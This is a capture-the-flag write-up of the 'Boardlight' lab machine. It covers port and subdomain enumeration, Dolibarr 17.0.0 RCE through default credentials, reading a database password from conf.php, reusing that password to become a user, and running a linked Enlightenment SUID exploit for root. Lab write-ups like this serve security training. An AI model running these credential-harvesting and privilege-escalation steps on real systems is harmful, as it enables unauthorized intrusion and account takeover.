Boardlight
Enumeration
Port Scan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH0dV4gtJNo8ixEEBDxhUId6Pc/8iNLX16+zpUCIgmxxl5TivDMLg2JvXorp4F2r8ci44CESUlnMHRSYNtlLttiIZHpTML7ktFHbNexvOAJqE1lIlQlGjWBU1hWq6Y6n1tuUANOd5U+Yc0/h53gKu5nXTQTy1c9CLbQfaYvFjnz
rR3NQ6Hw7ih5u3mEjJngP+Sq+dpzUcnFe1BekvBPrxdAJwN6w+MSpGFyQSAkUthrOE4JRnpa6jSsTjXODDjioNkp2NLkKa73Yc2DHk3evNUXfa+P8oWFBk8ZXSHFyeOoNkcqkPCrkevB71NdFtn3Fd/Ar07co0ygw90Vb2q34cu1Jo/1oPV1UFsvcwaKJuxBKozH+VA0F9hyriPKjsv
TRCbkFjweLxCib5phagHu6K5KEYC+VmWbCUnWyvYZauJ1/t5xQqqi9UWssRjbE1mI0Krq2Zb97qnONhzcclAPVpvEVdCCcl0rYZjQt6VI1PzHha56JepZCFCNvX3FVxYzEk=
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK7G5PgPkbp1awVqM5uOpMJ/xVrNirmwIT21bMG/+jihUY8rOXxSbidRfC9KgvSDC4flMsPZUrWziSuBDJAra5g=
| 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILHj/lr3X40pR3k9+uYJk4oSjdULCK0DlOxbiL66ZRWg
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory Scan
└─➜ ffuf -u http://board.htb/FUZZ -w /usr/share/wordlists/Discovery/Web-Content/common.txt -e .php [1]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/Discovery/Web-Content/common.txt
:: Extensions : .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.hta [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 316ms]
.htaccess.php [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 318ms]
.htpasswd [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 319ms]
.htaccess [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 320ms]
.hta.php [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 320ms]
.htpasswd.php [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 322ms]
about.php [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 334ms]
contact.php [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 410ms]
css [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 409ms]
do.php [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 408ms]
images [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 385ms]
index.php [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 408ms]
index.php [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 409ms]
js [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 408ms]
server-status [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 407ms]
:: Progress: [9454/9454] :: Job [1/1] :: 103 req/sec :: Duration: [0:01:38] :: Errors: 0 ::
Subdomain Scan
└─➜ ffuf -u http://board.htb/ -w /usr/share/wordlists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.board.htb' -fw 6243 [0]
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 6243
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 1944ms]
:: Progress: [4989/4989] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:49] :: Errors: 0 ::
Web Attack
Under subdomain we can see it's hosting dolibarr (v17.0.0). This version is vulnerable to RCE.
You can login with default credentials (
admin:admin
) on (crm.board.htb
)
Resource
https://github.com/advisories/GHSA-9wqr-5jp4-mjmh
https://www.swascan.com/security-advisory-dolibarr-17-0-0/
Alternative: https://www-swascan-com.translate.goog/it/security-advisory-dolibarr-17-0-0/?_x_tr_sl=it&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc
Shell www-data
After we exploit, we get a www-data shell
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
The default config files are under htdocs/conf/conf.php
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';
<<SNIP>>
Shell - user
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su - larissa
su - larissa
Password: serverfun2$2023!!
id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
We can ssh into the box for proper tty shell.
Shell root
larissa@boardlight:~$ find / -perm -4000 -ls 2>find / -perm -4000 -ls 2>/dev/null
2491 16 -rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
608 16 -rwsr-sr-x 1 root root 14488 Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
17633 28 -rwsr-xr-x 1 root root 26944 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
17628 16 -rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
17627 16 -rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
17388 16 -rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
<<SNIP>>
If we google about enlightenment, we see it's a WM for Xorg.
larissa@boardlight:~$ enlightenment --version
ESTART: 0.00002 [0.00002] - Begin Startup
ESTART: 0.00121 [0.00119] - Signal Trap
ESTART: 0.00123 [0.00002] - Signal Trap Done
ESTART: 0.00277 [0.00154] - Eina Init
ESTART: 0.00496 [0.00219] - Eina Init Done
ESTART: 0.00500 [0.00004] - Determine Prefix
ESTART: 0.00693 [0.00193] - Determine Prefix Done
ESTART: 0.00696 [0.00003] - Environment Variables
ESTART: 0.00698 [0.00002] - Environment Variables Done
ESTART: 0.00699 [0.00001] - Parse Arguments
Version: 0.23.1
E: Begin Shutdown Procedure!
After googling the version, we can find the exploit, https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh
larissa@boardlight:/tmp/heap$ ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)
________________________heapbytes' still pwning
Last updated